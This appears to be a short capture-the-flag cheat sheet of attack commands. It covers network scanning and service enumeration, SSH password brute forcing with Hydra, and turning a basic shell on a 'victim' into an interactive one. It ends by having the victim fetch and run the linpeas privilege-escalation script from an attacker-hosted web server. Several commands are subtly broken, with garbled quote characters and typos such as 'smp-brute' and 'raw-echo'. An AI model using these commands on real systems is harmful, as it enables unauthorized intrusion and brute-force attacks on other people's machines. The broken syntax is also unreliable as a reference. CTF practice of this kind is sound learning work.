ctf setup
Last updated
Last updated
SCANNING AND ENUMERATION
Nmap -T4 -n <IP>
rustscan
Nmap -sVC -A <IP>
Nmap -p -T4 -n <IP>
Nping <IP>
Unicornscan <IP>
Netdiscover -r <IP>
hping3
Masscan <IP> -p<PORTS>
Enum4linux <IP>
SNMP
Onesixtyone -c communityfile.txt <IP>
Nmap <IP> -Pn -sU -p 161 -script=smp-brute
Snmpwalk -c community -vSNMPVersion target mibvalue
Http
Robots.txt
Admin.php
Login.php
Gobuster -u <IP> -w /usr/share/wordlists
Wfuzz -w wordlist http://<IP>/FUZZ
Dirb <IP>
Sqlmap -u <IP>
SMB
Nbtscan <IP>
Smbclient -L //<IP>
Smbclient //mount/share
Nmblookup -A <IP>
Ftp
***LOUD*** wget -r ftp://anonymous:@10.10.10.152
Us: anonymous pw: anonymous
Ssh
Brute forcing
Hydra -l admin -P pass.txt <IP> -r 4 ssh
Upgrading a dummy shell
On Victim see what version of python is installed find / -name python* 2>/dev/null
python# -C βimport pty; pty.spawn(β/bin/bashβ)β
Ctrl Z
Stty raw-echo;fg
Linux Privilege Escalation
on box (script enumeration)
Upload Linpeas to target into a writable directory ex:\tmp, \home\user
On Kali start your own web server where linpeas resides. Sudo python -m http.server 80
From victim wget http://Kali-IP/linpeas.sh
On Victim make linpeas executable chmod +x linpeas.sh
./linpeas.sh